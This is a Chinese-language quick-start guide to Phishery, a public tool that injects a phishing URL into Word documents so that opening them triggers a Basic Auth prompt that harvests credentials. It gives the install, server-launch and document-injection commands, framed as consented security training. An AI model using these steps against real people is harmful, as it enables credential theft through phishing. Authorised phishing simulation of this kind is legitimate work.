Phishery 指南：钓鱼工具与安全测试实践

Phishery 指南：钓鱼工具与安全测试实践

phisheryAn SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector项目地址:https://gitcode.com/gh_mirrors/ph/phishery

1. 项目介绍

Phishery 是一个基于 Go 语言开发的简单 SSL 启用 HTTP 服务器，主要用于进行基本身份验证钓鱼（phishing）以捕获目标的凭证。它允许注入 URL 到 .docx Word 文档中，当用户打开这些文档时，Microsoft Word 将自动向伪造的 web 服务器发送请求，显示认证对话框，诱使用户提供敏感信息。

GitHub 仓库：https://github.com/ryhanson/phishery

2. 项目快速启动

安装 Phishery

首先，确保你的环境中已安装了 Go。然后，通过 go get 获取 Phishery：

go get github.com/ryhanson/phishery

或者，你可以从项目发布页面下载预编译的二进制文件并解压到你的 PATH 路径：

wget https://github.com/ryhanson/phishery/releases/download/v1.0.2/phishery1.0.2windows-amd64.tar.gz
tar -xzvf phishery1.0.2windows-amd64.tar.gz
cp phishery /usr/local/bin

启动 Phishery 服务

phishery -l ":8080" -c "mycert.pem" -k "mykey.pem"

参数解释：

• -l：监听的本地端口。
• -c：SSL 证书文件路径。
• -k：SSL 私钥文件路径。

创建钓鱼 .docx 文件

phishery -u "https://your-phishing-site.example.com/" -i "good.docx" -o "bad.docx"

参数解释：

• -u：要注入到 Word 文档中的 URL。
• -i：原始 .docx 文件路径。
• -o：注入 URL 后的新 .docx 文件路径。

3. 应用案例和最佳实践

1. 模拟攻击场景：用于网络安全培训，教育用户识别钓鱼邮件和网站。
2. 安全审计：在受控环境中测试员工对基本认证钓鱼的抵抗力。
3. 安全意识提升：创建模拟钓鱼文档，发送给团队成员，让他们体验并了解钓鱼风险。

最佳实践：

• 在合法的测试环境中运行 Phishery。
• 仅对知情同意的目标进行测试，遵循所有适用法律和法规。
• 总是提供测试结果反馈，帮助提高安全意识。

4. 典型生态项目

• OpenSSL：用于生成 SSL 证书和私钥。
• Microsoft Office 或类似软件：用于处理 .docx 文件。
• Word-to-PDF 工具：将含有注入 URL 的文档转换为 PDF，扩大覆盖范围。
• Burp Suite 或 ZAP (Zed Attack Proxy)：用于监控网络流量和验证钓鱼效果。

---

本指南旨在提供 Phishery 的基本操作，更多高级用法和自定义配置可参考项目官方文档或源码。

phisheryAn SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector项目地址:https://gitcode.com/gh_mirrors/ph/phishery